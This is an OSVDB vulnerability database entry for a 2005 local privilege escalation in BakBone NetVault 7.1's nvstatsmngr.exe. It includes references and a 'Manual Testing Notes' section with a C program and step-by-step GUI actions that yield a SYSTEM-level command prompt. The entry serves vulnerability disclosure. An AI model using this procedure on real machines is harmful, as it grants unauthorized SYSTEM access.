15900 : BakBone NetVault nvstatsmngr.exe Local Privilege Escalation
Printer | http://osvdb.org/15900 | Email This | Edit Vulnerability

Views This Week	Views All Time	Added to OSVDB	Last Modified	Modified (since 2008)	Percent Complete
1	154	over 4 years ago	over 2 years ago	0 times	100%

Timeline

Disclosure Date	Exploit Publish Date
2005-04-27	2005-04-27

Description

NetVault contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered by a local attacker initiating the help functionality of the nvstatsmngr.exe process to execute arbitrary commands on the system with SYSTEM level privileges. This flaw may lead to a loss of integrity.

Classification

Location: Local Access Required
Attack Type: Input Manipulation
Impact: Loss of Integrity
Exploit: Exploit Public
Disclosure: OSVDB Verified

Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Products

BakBone Software, Inc.

NetVault

7.1

References

Bugtraq ID: 13408
Secunia Advisory ID: 15158
CVE ID: 2005-1372 (see also: NVD)
ISS X-Force ID: 20302
VUPEN Advisory: ADV-2005-0420
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0463.html
Vendor URL: http://www.bakbone.com/

Manual Testing Notes

Exploit:
Compile and run the following code to unhide the C:\ProgramFiles\BakBone Software\NetVault\bin\nvstatsmngr.exe window:

===Start Code===
#include <stdio.h>
#include <windows.h>

int main( void )
{
        HWND hWnd;
        char szWindowName[] = "C:\\Program Files\\BakBone
Software\\NetVault\\bin\\nvstatsmngr.exe";

printf( "Finding window %s\n", szWindowName );

hWnd = FindWindow( NULL, szWindowName );

if ( hWnd == NULL )
        {
                printf( "ERROR! Could not find window %s\n", szWindowName );
        
                exit( 1 );
        }

ShowWindow( hWnd, SW_SHOW );

return 0;
}
===End Code===

1. The C:\Program Files\BakBone Software\NetVault\bin\nvstatsmngr.exe window will appear. Access the window menu in the upper left and click Properties.
2. Right click on the word Window under the Display Options and click "What's This?"
3. Right click on the help text that is shown in yellow and click Print Topic.
4. Right click on any printer and click Open.
5. Click Help, Help Topics.
6. Right click in the right side of the help screen and click View Source.
7. Notepad will appear (running under the context of the SYSTEM account). Click File, click Open.
8. Change Files of type: to All Files, navigate to the system32 directory and locate cmd.exe. Right click cmd.exe and choose Open.

The result is a command prompt running under the context of the SYSTEM account.

Credit

RedTeam Pentesting - RedTeam Pentesting
David Rice - dricetep.com -

CVSSv2 Score

CVSSv2 Base Score = 4.6
Source: nvd.nist.gov | Generated: 2005-05-12 | Disagree?

Blogs

This product uses the Daylife API but is not endorsed or certified by Daylife.

This section lists the latest news and blogs found via the daylife API (and for older items, the technorati API), which mention or otherwise discuss this vulnerability.

None found at this time

Comments

Add Comment Hide Add Comment

No Comments.

The database information may change without any notice. Use of the information constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the copyright holder or distributor (OSVDB or OSF) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.